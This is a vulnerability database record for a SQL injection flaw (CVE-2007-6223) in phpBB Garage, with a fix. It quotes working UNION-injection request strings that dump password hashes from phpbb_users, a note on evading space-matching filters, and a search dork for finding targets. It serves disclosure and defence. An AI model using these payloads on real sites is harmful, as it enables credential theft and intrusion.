ID OSVDB:39696
Type osvdb
Reporter OSVDB
Modified 2007-12-03T00:00:00
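Description
phpBB Garage 1.2.0 Beta3 contains a SQL injection flaw in garage.php: the make_id parameter of the search action in browse mode lets a remote, unauthenticated attacker execute arbitrary SQL commands (CVSS 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P). This record lists no fixed version; where the script is still deployed, make_id should be validated as an integer and passed to the query as a bound parameter.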
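Manual Testing Notes
The request strings below are as published in the referenced advisory. `/**/` is an SQL inline comment used in place of spaces, so input filters and detection rules that only match literal spaces around UNION/SELECT will not match these requests.
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*
garage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*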
References:
Vendor URL: http://phpbbgarage.com
ISS X-Force ID: 38832
Generic Exploit URL: http://www.milw0rm.com/exploits/4686
CVE-2007-6223
Bugtraq ID: 26683
{"href": "https://vulners.com/osvdb/OSVDB:39696", "history": [], "id": "OSVDB:39696", "reporter": "OSVDB", "published": "2007-12-03T00:00:00", "description": "## Manual Testing Notes\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\n## References:\nVendor URL: http://phpbbgarage.com\nISS X-Force ID: 38832\nGeneric Exploit URL: http://www.milw0rm.com/exploits/4686\n[CVE-2007-6223](https://vulners.com/cve/CVE-2007-6223)\nBugtraq ID: 26683\n", "title": "phpBB Garage garage.php search Action make_id Variable SQL Injection", "lastseen": "2017-04-28T13:20:35", "bulletinFamily": "software", "type": "osvdb", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "hash": "2c058c93f9be0e2ecc9a4b418913cb48b4b37034e921ff6e0c277f5a66b94f7c", "references": [], "edition": 1, "cvelist": ["CVE-2007-6223"], "affectedSoftware": [], "viewCount": 4, "enchantments": {"score": {"value": 6.9, "vector": "NONE", "modified": "2017-04-28T13:20:35"}, "dependencies": {"references": [{"type": "cve", "idList": ["CVE-2007-6223"]}, {"type": "exploitdb", "idList": ["EDB-ID:4686"]}], "modified": "2017-04-28T13:20:35"}, "vulnersScore": 6.9}, "hashmap": [{"key": "affectedSoftware", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "bulletinFamily", "hash": "f9fa10ba956cacf91d7878861139efb9"}, {"key": "cvelist", "hash": "70dd3f182d4a3b787537a11b5825f9f5"}, {"key": "cvss", "hash": "e5d275b3ebd62646b78320753699e02e"}, {"key": "description", "hash": "7ef55c6e63c258bf471befff58be2a86"}, {"key": "href", "hash": "7dac356165b3ac6688be0ea4d462b3ba"}, {"key": "modified", "hash": "ebef0da5733dce975a1369dd478bcf6e"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ebef0da5733dce975a1369dd478bcf6e"}, {"key": "references", "hash": 
"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "955b328dc7cd615c13af5464c9183464"}, {"key": "title", "hash": "5518e7276ab2de1dfaab249aa35df74d"}, {"key": "type", "hash": "1327ac71f7914948578f08c54f772b10"}], "objectVersion": "1.2", "modified": "2007-12-03T00:00:00"}
{"cve": [{"lastseen": "2019-05-29T18:09:02", "bulletinFamily": "NVD", "description": "SQL injection vulnerability in garage.php in phpBB Garage 1.2.0 Beta3 allows remote attackers to execute arbitrary SQL commands via the make_id parameter in a search action in browse mode.", "modified": "2017-09-29T01:29:00", "id": "CVE-2007-6223", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2007-6223", "published": "2007-12-04T17:46:00", "title": "CVE-2007-6223", "type": "cve", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "exploitdb": [{"lastseen": "2016-01-31T21:31:38", "bulletinFamily": "exploit", "description": "phpBB Garage 1.2.0 Beta3 Remote SQL Injection Vulnerability. CVE-2007-6223. Webapps exploit for php platform", "modified": "2007-12-03T00:00:00", "published": "2007-12-03T00:00:00", "id": "EDB-ID:4686", "href": "https://www.exploit-db.com/exploits/4686/", "type": "exploitdb", "title": "phpBB Garage 1.2.0 Beta3 - Remote SQL Injection Vulnerability", "sourceData": "Title: phpBB Garage v1.2.0 - Beta3 Remote SQL Injection Vulnerability\nDork: \"Powered By phpBB Garage 1.2.0\"\n\nAuthor: maku234\nE-Mail: maku234@gmail.com\n\n\n\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/1,2/*\ngarage.php?mode=browse&search=yes&make_id=-1/**/union/**/select/**/concat(user_password,char(94),username),2/**/from/**/phpbb_users/**/where/**/user_id=2/*\n\n# milw0rm.com [2007-12-03]\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}, "sourceHref": "https://www.exploit-db.com/download/4686/"}]}